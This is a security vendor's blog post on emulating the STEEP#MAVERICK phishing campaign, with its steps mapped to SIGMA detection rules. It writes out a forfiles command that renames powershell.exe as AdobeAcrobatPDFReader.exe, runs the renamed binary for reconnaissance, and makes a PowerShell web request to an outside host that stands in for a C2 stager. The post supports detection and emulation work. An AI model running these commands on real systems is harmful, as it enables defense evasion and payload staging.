<< All Posts

STEEP#MAVERICK: Rename Adobe

November 3, 2022

The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique leveraged by the threat actor shortly after initial infection. Similar to many targeted campaigns, initial infection begins with a phishing email containing a malicious attachment. In STEEP#MAVERICK, the email contained a compressed (.zip) file with a shortcut (.lnk) file inside. The shortcut file attempts to hide its execution by calling forfiles.exe.

Our emulation begins here with a step where the threat actor calls forfiles.exe to copy powershell.exe to C:\Windows and rename it to AdobeAcrobatPDFReader.

We then use the newly renamed powershell to obtain the name of the domain the device belongs to and if a hypervisor is present. The threat actor did not perform this step in the campaign but we include it here to provide a detection opportunity.

The following step is where we mimic a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager. 

Clean-up steps to remove the renamed powershell.exe file are included after a 3 minute delay.

Detection Opportunities

Step Number Request SIGMA Rule(s) Author(s)
4 run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe Creation of an Executable by an Executable frack113
Indirect Command Execution E.M. Anhaus, oscd.community
Suspicious Copy From or To System32 Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)
Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
5 run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent Highly Relevant Renamed Binary Matthew Green - @mgreen27, Florian Roth
In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
Renamed Binary Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)
Renamed PowerShell Florian Roth, frack113
Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
8 upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } } Alternate PowerShell Hosts Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Alternate PowerShell Hosts Pipe Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
Raw Disk Access Using Illegitimate Tools Teymur Kheirkhabarov, oscd.community
Suspicious WSMAN Provider Image Loads Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)

This post discusses active research by SCYTHE and other cited third parties into an ongoing threat.  The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

References

STAY UP TO DATE WITH OUR CONTENT!

Thank you! Your submission has been received!
Oops! Something went wrong while submitting the form

More Unicorn Content

See All Posts

let our tech speak for itself

Know where you stand with SCYTHE. Talk to us to start the evaluation process today! We’d love to talk to you about how SCYTHE can fit into your cybersecurity workflow.

EVALUATE

LEARN MORE